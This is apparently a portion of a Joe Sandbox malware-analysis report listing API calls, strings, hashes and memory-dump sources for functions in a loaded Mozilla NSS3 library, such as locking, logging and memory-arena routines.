API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: be76ad09fd0f144738036b71b99f3caf06837b4043394bab7db215694cddf7b3
Instruction ID: 380120071586ba6334adfa0607b5a08b881cf2b329344a6a8eb64b93714528c7
Opcode Fuzzy Hash: be76ad09fd0f144738036b71b99f3caf06837b4043394bab7db215694cddf7b3
Instruction Fuzzy Hash: 556170B6F002058BEB00CF68D884BDEB7F1AF58348F654128DE55A7701E776E865CBA1

Function 6CE97C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CFE2120,Function_00097E60,00000000,?,?,?,?,6CF1067D,6CF11C60,00000000), ref: 6CE97C81

Part of subcall function 6CE04C70: TlsGetValue.KERNEL32(?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04C97
Part of subcall function 6CE04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CB0
Part of subcall function 6CE04C70: PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CC9

TlsGetValue.KERNEL32 ref: 6CE97CA0
EnterCriticalSection.KERNEL32(?), ref: 6CE97CB4
PR_Unlock.NSS3 ref: 6CE97CCF

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

TlsGetValue.KERNEL32 ref: 6CE97D04
EnterCriticalSection.KERNEL32(?), ref: 6CE97D1B
realloc.MOZGLUE(-00000050), ref: 6CE97D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE97DF4
PR_Unlock.NSS3 ref: 6CE97E0E

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: c567f159ce9a09e59b466900f890c5767708631dab080eb327adf8b69376ad46
Instruction ID: 5918d60f3add2a796bb62d7073ce68c7553c4a7fa198cd3bd8286ec462c01b57
Opcode Fuzzy Hash: c567f159ce9a09e59b466900f890c5767708631dab080eb327adf8b69376ad46
Instruction Fuzzy Hash: 0051D271E14201ABEB809F28DC84B6577B5EB4B31CF374129ED0487722FB369999CA81

Function 6CE04C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CB0
PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04D97
PR_Lock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04DBA
PR_WaitCondVar.NSS3 ref: 6CE04DD4
PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04DEF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 68fb851ba96a7b2df8217ef84cfea27918401213f3123fff0575c0be9980a6d0
Instruction ID: a1fe9dbd8fca1bcf18cab3e70344daaa18d428ecf390d8df15486bbc2a7af0cb
Opcode Fuzzy Hash: 68fb851ba96a7b2df8217ef84cfea27918401213f3123fff0575c0be9980a6d0
Instruction Fuzzy Hash: C6418EB1E14B15CFDB80BF79D1842597BB4BF0A318F25866AD8889B711EB30D895CBC1

Function 6CF97CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CF97CE0

Part of subcall function 6CF49BF0: TlsGetValue.KERNEL32(?,?,?,6CF90A75), ref: 6CF49C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF97D36
PR_Realloc.NSS3(?,00000080), ref: 6CF97D6D
PR_GetCurrentThread.NSS3 ref: 6CF97D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CF97DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF97DD8
malloc.MOZGLUE(00000080), ref: 6CF97DF8
PR_GetCurrentThread.NSS3 ref: 6CF97E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6CF97DF0
:%s:%d:0x%lx, xrefs: 6CF97DB9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 09f480a22bf7305ebdb90fed6db81f0711b7472d7eaf7d1181dd5c5c63a4e4c2
Instruction ID: a2bf96345569ecc3a341352b4a10a50633090025b0378f482660038778e63b3d
Opcode Fuzzy Hash: 09f480a22bf7305ebdb90fed6db81f0711b7472d7eaf7d1181dd5c5c63a4e4c2
Instruction Fuzzy Hash: BC4195B16002059FEF04CF29CC90A6B37B6FF84318B25456EE9199BB61D731E941CBA1

Function 6CF97E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF97E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6CF97E46

Part of subcall function 6CE71240: TlsGetValue.KERNEL32(00000040,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71267
Part of subcall function 6CE71240: EnterCriticalSection.KERNEL32(?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE7127C
Part of subcall function 6CE71240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE71291
Part of subcall function 6CE71240: PR_Unlock.NSS3(?,?,?,?,6CE7116C,NSPR_LOG_MODULES), ref: 6CE712A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6CF97EAF
PR_ImportFile.NSS3(?), ref: 6CF97ECF
PR_GetCurrentThread.NSS3 ref: 6CF97ED6
PR_ImportTCPSocket.NSS3(?), ref: 6CF97F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6CF97F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6CF97F15

Strings

NSPR_INHERIT_FDS, xrefs: 6CF97E41
%d:0x%lx, xrefs: 6CF97EA9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: 0ba8fe9974494ee4a1ba52f18b335ea9b2cd288e045ee06c0be6427cb4eeafe7
Instruction ID: 3f5217eaee04df1f68cb7164cb966063a7d7b688988f6b63773ed22d2f502763
Opcode Fuzzy Hash: 0ba8fe9974494ee4a1ba52f18b335ea9b2cd288e045ee06c0be6427cb4eeafe7
Instruction Fuzzy Hash: 31310472E04219DBFF01AB69C841AEBB7B9FF45348F204567D806A7A11E7719D08C7D2

Function 6CEA4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CEA4E90
EnterCriticalSection.KERNEL32 ref: 6CEA4EA9
TlsGetValue.KERNEL32 ref: 6CEA4EC6
EnterCriticalSection.KERNEL32 ref: 6CEA4EDF
PL_HashTableLookup.NSS3 ref: 6CEA4EF8
PR_Unlock.NSS3 ref: 6CEA4F05
PR_Now.NSS3 ref: 6CEA4F13
PR_Unlock.NSS3 ref: 6CEA4F3A

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

Strings

bUl, xrefs: 6CEA4E5C
bUl, xrefs: 6CEA4F3F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUl$bUl
API String ID: 326028414-3943757760
Opcode ID: 2a36848377d0c645700cf120bea43b40a97721aeb65d7ef1c6d1e289db6d66b8
Instruction ID: dfd2db63c3fa0c2e4a7fa9d3c916e9b019982d997cb0352316ea5619d7ee782b
Opcode Fuzzy Hash: 2a36848377d0c645700cf120bea43b40a97721aeb65d7ef1c6d1e289db6d66b8
Instruction Fuzzy Hash: C9413DB4A006059FCB00EF78D48496ABBF4FF49314B11956AEC599B711EB30E895CF91

Function 6CECECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CECDE64), ref: 6CECED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CECED22

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

PL_FreeArenaPool.NSS3(?), ref: 6CECED4A
PL_FinishArenaPool.NSS3(?), ref: 6CECED6B
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CECED38

Part of subcall function 6CE04C70: TlsGetValue.KERNEL32(?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04C97
Part of subcall function 6CE04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CB0
Part of subcall function 6CE04C70: PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CECED52
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CECED83
PL_FreeArenaPool.NSS3(?), ref: 6CECED95
PL_FinishArenaPool.NSS3(?), ref: 6CECED9D

Part of subcall function 6CEE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CEE127C,00000000,00000000,00000000), ref: 6CEE650E

Strings

security, xrefs: 6CECED06

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 70dae9fb96a02dbc746212bc3ad05ab8d66f6300f4b885122f3bc95aff0ef661
Instruction ID: ae0e3578f9ba41be6a7ea40cde25bb66cad44abd5027090e48f1eb1f77da9c4d
Opcode Fuzzy Hash: 70dae9fb96a02dbc746212bc3ad05ab8d66f6300f4b885122f3bc95aff0ef661
Instruction Fuzzy Hash: 14115B72A0061467E6505635AD46BBF7678AF0A74CF20082DE82063F41FB25A51D86E7

Function 6CEB2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CEB2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CEB2D07

Part of subcall function 6CF909D0: PR_Now.NSS3 ref: 6CF90A22
Part of subcall function 6CF909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CF90A35
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CF90A66
Part of subcall function 6CF909D0: PR_GetCurrentThread.NSS3 ref: 6CF90A70
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CF90A9D
Part of subcall function 6CF909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CF90AC8
Part of subcall function 6CF909D0: PR_vsmprintf.NSS3(?,?), ref: 6CF90AE8
Part of subcall function 6CF909D0: EnterCriticalSection.KERNEL32(?), ref: 6CF90B19
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF90B48
Part of subcall function 6CF909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF90C76
Part of subcall function 6CF909D0: PR_LogFlush.NSS3 ref: 6CF90C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CEB2D22

Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(?), ref: 6CF90B88
Part of subcall function 6CF909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF90C5D
Part of subcall function 6CF909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CF90C8D
Part of subcall function 6CF909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF90C9C
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(?), ref: 6CF90CD1
Part of subcall function 6CF909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CF90CEC
Part of subcall function 6CF909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF90CFB
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF90D16
Part of subcall function 6CF909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CF90D26
Part of subcall function 6CF909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF90D35
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CF90D65
Part of subcall function 6CF909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CF90D70
Part of subcall function 6CF909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF90D90
Part of subcall function 6CF909D0: free.MOZGLUE(00000000), ref: 6CF90D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CEB2D3B

Part of subcall function 6CF909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CF90BAB
Part of subcall function 6CF909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF90BBA
Part of subcall function 6CF909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CF90D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CEB2D54

Part of subcall function 6CF909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF90BCB
Part of subcall function 6CF909D0: EnterCriticalSection.KERNEL32(?), ref: 6CF90BDE
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(?), ref: 6CF90C16

Strings

pLabel = 0x%p, xrefs: 6CEB2D4F
pPin = 0x%p, xrefs: 6CEB2D1D
C_InitToken, xrefs: 6CEB2CE7
slotID = 0x%x, xrefs: 6CEB2D02
ulPinLen = %d, xrefs: 6CEB2D36

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 50fadadd8ba753223f3eb7115fe1d1798f0070106fa4cae466fc77f89a8e65a8
Instruction ID: c160faf2e4032a68db3403bb183fba400bdd2d04b8fe9ad0a2e66101dd721e92
Opcode Fuzzy Hash: 50fadadd8ba753223f3eb7115fe1d1798f0070106fa4cae466fc77f89a8e65a8
Instruction Fuzzy Hash: ED210335A00045FFEB809BA0DE8CB553BB2EF4A31DF544118F504A3722DB728909CB61

Function 6CF90EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CE72357), ref: 6CF90EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CE72357), ref: 6CF90EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF90EE6

Part of subcall function 6CF909D0: PR_Now.NSS3 ref: 6CF90A22
Part of subcall function 6CF909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CF90A35
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CF90A66
Part of subcall function 6CF909D0: PR_GetCurrentThread.NSS3 ref: 6CF90A70
Part of subcall function 6CF909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CF90A9D
Part of subcall function 6CF909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CF90AC8
Part of subcall function 6CF909D0: PR_vsmprintf.NSS3(?,?), ref: 6CF90AE8
Part of subcall function 6CF909D0: EnterCriticalSection.KERNEL32(?), ref: 6CF90B19
Part of subcall function 6CF909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CF90B48
Part of subcall function 6CF909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CF90C76
Part of subcall function 6CF909D0: PR_LogFlush.NSS3 ref: 6CF90C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF90EFA

Part of subcall function 6CE7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE7AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF90F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CF90ED9, 6CF90EE5, 6CF90F06, 6CF90F0B
Aborting, xrefs: 6CF90EB3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 4e92d674284941fa29d97917c9ed58a6c4d9435671c0bcc6e11f942741011e25
Instruction ID: 4254545e8487735f9765c7cea0aab92af3006798ca151207e82986de25977d4f
Opcode Fuzzy Hash: 4e92d674284941fa29d97917c9ed58a6c4d9435671c0bcc6e11f942741011e25
Instruction Fuzzy Hash: 36F08CB5A001147BEE402B609C4AE9B3F2DDF8A664F004024FD1956602DA76E91496B2

Function 6CEF4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CEF4DCB

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CEF4DE1

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CEF4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEF4E59

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CFB300C,00000000), ref: 6CEF4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CEF4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CEF4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CEF521A

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
